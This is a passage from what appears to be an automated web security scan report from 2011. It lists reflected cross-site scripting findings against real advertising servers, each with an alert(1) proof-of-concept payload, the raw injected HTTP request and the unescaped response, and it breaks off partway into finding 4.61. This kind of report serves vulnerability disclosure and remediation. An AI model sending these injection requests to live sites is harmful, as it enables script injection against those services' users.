Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:59 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1208

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?http://ad.bnmla.com/click?pid=563&zid=3621&aid=30790&cid=506a45c7"><script>alert(1)</script>ea258321cd6&advid=(null)">
...[SNIP]...

4.53. http://ad.bnmla.com/serve [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4bee"><script>alert(1)</script>c24feb1b843 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=563&zid=3621&aid=30790&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253fd4bee"><script>alert(1)</script>c24feb1b843 HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:59 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1204

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?d4bee"><script>alert(1)</script>c24feb1b843http://ad.bnmla.com/click?pid=563&zid=3621&aid=30790&cid=506&advid=70">
...[SNIP]...

4.54. http://ad.bnmla.com/serve [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b953a'-alert(1)-'0bfbfdc226e was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?pid=563&cb=456064623&noe=1&zid=3621&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253fb953a'-alert(1)-'0bfbfdc226e HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:20:44 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Set-Cookie: ij=eNqrVlAysjQ2tlBSsFKIVjDUUTA0NjA1MDY2MzFRiFWoBQBkjQZy;path=/;domain=.bnmla.com;expires=Wednesday, 30-Dec-2036 16:00:00 GMT
Set-Cookie: imp=;path=/;domain=.bnmla.com;expires=Wednesday, 30-Dec-2036 16:00:00 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2079
Connection: close
Content-Type: text/plain

document.write('<iframe allowtransparency="true" src="http://ad.bnmla.com/serve?st=1&pid=563&zid=3621&aid=29338&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B2
...[SNIP]...
qcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253fb953a'-alert(1)-'0bfbfdc226e" width="300" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0">
...[SNIP]...

4.55. http://ad.bnmla.com/serve [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b38"><script>alert(1)</script>14b232d7784 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=56317b38"><script>alert(1)</script>14b232d7784&zid=3621&aid=30790&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253f HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:42 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1204

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?http://ad.bnmla.com/click?pid=56317b38"><script>alert(1)</script>14b232d7784&zid=3621&aid=30790&cid=506&advid=70">
...[SNIP]...

4.56. http://ad.bnmla.com/serve [zid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.bnmla.com
Path:   /serve

Issue detail

The value of the zid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c838b"><script>alert(1)</script>7cfd2f0fb1f was submitted in the zid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve?st=1&pid=563&zid=3621c838b"><script>alert(1)</script>7cfd2f0fb1f&aid=30790&cid=506&ne=1&click=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b03/3/0/%252a/w%253B239983083%253B0-0%253B0%253B28217125%253B4307-300/250%253B40891622/40909409/1%253Bu%253D300x250%7Cbpage%7Cmid_article%7C2012-election%252C@mostpopular%252Crick-santorum%252Celections-2012%252Crick-santorum-for-president%252Csantorum-for-president%252Crick-santorum-2012%252Crick-santorum-south-carolina-straw-poll%252Csantorum-2012%252Csouth-carolina-primary-election%252Csouth-carolina-%253B%257Eokv%253D%253Bfeatured-posts%253D1%253Bpolitics%253D1%253B%253Bentry_id%253D859012%253B2012-election%253D1%253B@mostpopular%253D1%253Brick-santorum%253D1%253Belections-2012%253D1%253Brick-santorum-for-president%253D1%253Bsantorum-for-president%253D1%253Brick-santorum-2012%253D1%253Brick-santorum-south-carolina-straw-poll%253D1%253Bsantorum-2012%253D1%253Bsouth-carolina-primary-election%253D1%253Bsouth-carolina-straw-poll%253D1%253Bsouth-carolina-straw-poll-2011%253D1%253Bsouth-carolina-straw-poll-results%253D1%253Bglobal%253D1%253Bcap_12%253Dn%253Bqcs%253DD%253Bqcs%253DT%253Bqcs%253D2689%253Bqcs%253D2687%253Bqcs%253D2685%253Bqcs%253D1908%253Bqcs%253D1905%253Bqcs%253D1592%253Bqcs%253D683%253Bqcs%253D680%253Bqcs%253D679%253Bqcs%253D678%253Bqcs%253D666%253Bqcs%253D665%253Bqcs%253B%257Eaopt%253D2/1/ff/1%253B%257Esscs%253D%253f HTTP/1.1
Host: ad.bnmla.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ij=eNqrVlAyNjC3NFBSsFKIVjDUUTA0NjA1MDY2MjZXiFWoBQBj4QZq; imp=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:21:42 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1204

<html><head></head><body style="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b03/3/0/*/w;239983083;0-0;0;28217125;4307-300/250;40891622/40909409/1;u=300
...[SNIP]...
;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs;~aopt=2/1/ff/1;~sscs=?http://ad.bnmla.com/click?pid=563&zid=3621c838b"><script>alert(1)</script>7cfd2f0fb1f&aid=30790&cid=506&advid=70">
...[SNIP]...

4.57. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c66"-alert(1)-"53d49cc6164 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=d9c66"-alert(1)-"53d49cc6164 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38065
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 10 May 2011 14:20:18 GMT
Expires: Tue, 10 May 2011 14:20:18 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=d9c66"-alert(1)-"53d49cc6164";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1302134510253.uniqueId;
this.thirdPartyImpUrl = "";
this.
...[SNIP]...

4.58. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 136c0"-alert(1)-"94a183be85b was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB136c0"-alert(1)-"94a183be85b&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:16:32 GMT
Content-Length: 7143

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB136c0"-alert(1)-"94a183be85b&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.59. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a81e"-alert(1)-"71eef48a17a was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-52209604951223753a81e"-alert(1)-"71eef48a17a&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:19:18 GMT
Content-Length: 7143

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-52209604951223753a81e"-alert(1)-"71eef48a17a&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

4.60. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75a94'-alert(1)-'780ad4b53e3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-522096049512237575a94'-alert(1)-'780ad4b53e3&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:19:23 GMT
Content-Length: 38065

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-522096049512237575a94'-alert(1)-'780ad4b53e3&adurl=http://ad.doubleclick.net/2493053/redirect_nexuss_gdn.html">
...[SNIP]...

4.61. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

